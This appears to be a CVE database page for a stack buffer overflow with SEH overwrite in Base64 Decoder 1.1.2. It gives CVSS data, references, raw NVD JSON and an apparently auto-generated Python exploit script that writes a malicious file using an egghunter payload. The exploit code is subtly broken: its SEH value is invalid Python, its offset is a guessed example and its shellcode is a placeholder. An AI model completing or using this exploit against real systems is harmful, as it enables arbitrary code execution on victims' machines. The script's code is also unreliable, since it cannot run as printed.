CVE-2019-25634

Description

Base64 Decoder 1.1.2 contains a stack-based buffer overflow vulnerability that allows local attackers to execute arbitrary code by triggering a structured exception handler (SEH) overwrite. Attackers can craft a malicious input file that overflows a buffer, overwrites the SEH chain with a POP-POP-RET gadget address, and uses an egghunter payload to locate and execute shellcode for code execution.

CVSS Details

CVSS Score

8.4

Severity

HIGH

CVSS Vector

CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

No configuration data available.

Base64 Decoder 1.1.2

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

import sys

# Exploit generated for CVE-2019-25634
# Base64 Decoder 1.1.2 Stack Buffer Overflow / SEH Overwrite

# Offset to SEH structure (Example value)
offset = 500 
# nSEH (Next SEH) - short jump to shellcode
nseh = b"\xeb\x06\x90\x90" 
# SEH - Address of POP POP RET instruction (needs specific address)
seh = b"\x\x\x\x" 
# Egg tag for egghunter
egg = b"w00t"
# Egghunter payload (shellcode to find the egg)
egghunter = b"\x66\x81\xca\xff\x0f\x42\x52\x6a\x02\x58\xcd\x2e\x3c\x05\x5a\x74\xef\xb8\x77\x30\x30\x74\x8b\xfa\xaf\x75\xea\xaf\x75\xe7\xff\xe7"
# Payload construction
junk = b"A" * offset
shellcode = b"\xcc" * 300 

payload = junk + nseh + seh + egg + egg + egghunter + shellcode

try:
    with open("exploit.txt", "wb") as f:
        f.write(payload)
    print("[+] Malicious file created.")
except Exception as e:
    print(f"[-] Error: {e}")

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2019-25634
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2019-25634
[3] CVE Details https://www.cvedetails.com/cve/CVE-2019-25634/
[4] VulDB https://vuldb.com/cve/CVE-2019-25634
[5] http://4mhz.de/b64dec.html
[6] http://4mhz.de/download.php?file=b64dec-1-1-2.zip
[7] https://www.exploit-db.com/exploits/46625
[8] https://www.vulncheck.com/advisories/base64-decoder-local-buffer-overflow-seh-egghunter

Raw JSON Data

JSON

{"cve": {"id": "CVE-2019-25634", "sourceIdentifier": "[email protected]", "published": "2026-03-24T12:16:04.000", "lastModified": "2026-03-24T15:53:48.067", "vulnStatus": "Awaiting Analysis", "cveTags": [], "descriptions": [{"lang": "en", "value": "Base64 Decoder 1.1.2 contains a stack-based buffer overflow vulnerability that allows local attackers to execute arbitrary code by triggering a structured exception handler (SEH) overwrite. Attackers can craft a malicious input file that overflows a buffer, overwrites the SEH chain with a POP-POP-RET gadget address, and uses an egghunter payload to locate and execute shellcode for code execution."}, {"lang": "es", "value": "Base64 Decoder 1.1.2 contiene una vulnerabilidad de desbordamiento de búfer basado en pila que permite a atacantes locales ejecutar código arbitrario al desencadenar una sobrescritura del gestor de excepciones estructuradas (SEH). Los atacantes pueden crear un archivo de entrada malicioso que desborda un búfer, sobrescribe la cadena SEH con una dirección de gadget POP-POP-RET y utiliza una carga útil egghunter para localizar y ejecutar shellcode para la ejecución de código."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:L/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 8.6, "baseSeverity": "HIGH", "attackVector": "LOCAL", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "NONE", "userInteraction": "NONE", "vulnConfidentialityImpact": "HIGH", "vulnIntegrityImpact": "HIGH", "vulnAvailabilityImpact": "HIGH", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "baseScore": 8.4, "baseSeverity": "HIGH", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.5, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-787"}]}], "references": [{"url": "http://4mhz.de/b64dec.html", "source": "[email protected]"}, {"url": "http://4mhz.de/download.php?file=b64dec-1-1-2.zip", "source": "[email protected]"}, {"url": "https://www.exploit-db.com/exploits/46625", "source": "[email protected]"}, {"url": "https://www.vulncheck.com/advisories/base64-decoder-local-buffer-overflow-seh-egghunter", "source": "[email protected]"}]}}